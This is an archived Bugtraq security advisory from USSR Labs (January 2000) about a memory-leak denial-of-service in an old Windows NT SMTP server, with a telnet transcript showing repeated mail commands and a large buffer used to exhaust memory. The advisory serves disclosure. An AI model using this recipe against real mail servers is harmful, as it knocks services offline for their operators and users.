Bugtraq mailing list archives
Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP) Server for WinNT Version 1.9x
From: labs () USSRBACK COM (Ussr Labs)
Date: Thu, 13 Jan 2000 05:25:27 -0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP) Server for WinNT Version 1.9x USSR Advisory Code: USSR-2000031 Release Date: January 13, 2000 Systems Affected: Nosque Workshop, Super Mail Transfer Package (PORT 25) Server for WinNT Version 1.9x and maybe other versions. THE PROBLEM A memory leak exists in the Super Mail Transfer Package that may cause an NT host to stop functioning and/or need to be rebooted. The memory leak may occur when you connect to the SMTP port, all information you send to the system will be stored in memory, and SMTP support multiples HELO/ MAIL FROM/ RCPT TO / DATA in the same connection. If you did multiple HELO/ MAIL FROM/ RCPT TO / DATA in the same connection the memory may not be deallocated. This condition may cause the computer to stop functioning the moment memory runs out. Example: [hellme () die-communitech net$ telnet example.com 25 Trying example.com... Connected to example.com. Escape character is '^]'. 220 MachineNamet AttackerIp with SMTP for NT BD0198 HELO CHEEF 250 Hello, AtackerHostName AttackerIp mail to:<sssa.com> 250 <sssa.com@localhost> ok rcpt to:<sssc.com> 250 to:<sssc.com> ok Data 354 Send Mail Message Body; End with <CR><LF>.<CR><LF> [buffer] (point) 250 OK If you repeat this commands all information passed to the server will be stored in memory thus the memory leak problem, Where [buffer] is aprox. 10000 characters. Binary or source for this D.o.s: http://www.ussrback.com/ Do you do the w00w00? This advisory also acts as part of w00giving. This is another contribution to w00giving for all you w00nderful people out there. You do know what w00giving is don't you? http://www.w00w00.org/advisories.html Vendor Status: Contacted. Vendor Url: http://www.web-net.com/supermail/ Program Url: http://shareit1.element5.com/programs.html?nr=100364 Credit: USSRLABS SOLUTION Vendor say: The related problems are fixed in the next generation of SMTP call MsgCore/NT. Greetings: EEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and Wiretrip. u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com> iQA/AwUBOH2LxNybEYfHhkiVEQIgVwCcCLk1ZS9j/HYz2Wmto/Ddbg9RVpEAn2Rc vTxTmGxn8OehQXqO3YT9xdah =HFI/ -----END PGP SIGNATURE-----
Current thread:
- Info on some security holes reported against SCO Unixware., (continued)
- Info on some security holes reported against SCO Unixware. Aaron Sigel (Jan 13)
- ssh-proxy, a new approach to firewall software Magosanyi Arpad (Jan 13)
- Re: Hotmail security hole - injecting JavaScript using <IMG Ajax (Jan 11)
- Serious Bug in Corel Linux.(Local root exploit) tascon () ENETE GUI UVA ES (Jan 12)
- secure-programs howto Signal 11 (Jan 09)
- strace can lie ... but LTT might be handy Karim Yaghmour (Jan 09)
- 2nd attempt: AIX techlibss follows links Klaus.Kusche () OOE GV AT (Jan 10)
- NIS2k Bacano (Jan 11)
- Password issue in Axent ESM 5.0.1 Console Todd (Jan 12)
- Re: Password issue in Axent ESM 5.0.1 Console Scott Blake (Jan 14)
- Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP) Server for WinNT Version 1.9x Ussr Labs (Jan 13)
- Re: NIS2k Brad Griffin (Jan 13)
- Misleading sense of security in Netscape Craig Ruefenacht (Jan 13)
- Re: Misleading sense of security in Netscape Jefferson Ogata (Jan 18)
- New MySQL Available Scott (Jan 13)
- BindView Security Advisory: Local Promotion Vulnerability in Windows NT 4 BindView Security Advisory (Jan 13)
- Microsoft Security Bulletin (MS00-003) Microsoft Product Security (Jan 13)
- ICQ Buffer Overflow Exploit drew copley (Jan 11)
- Re: ICQ Buffer Overflow Exploit Dennis W. Mattison (Little Wolf) (Jan 12)
- Re: ICQ Buffer Overflow Exploit Michael DeSimone (Jan 13)
- Re: ICQ Buffer Overflow Exploit Tom Schumm (Jan 14)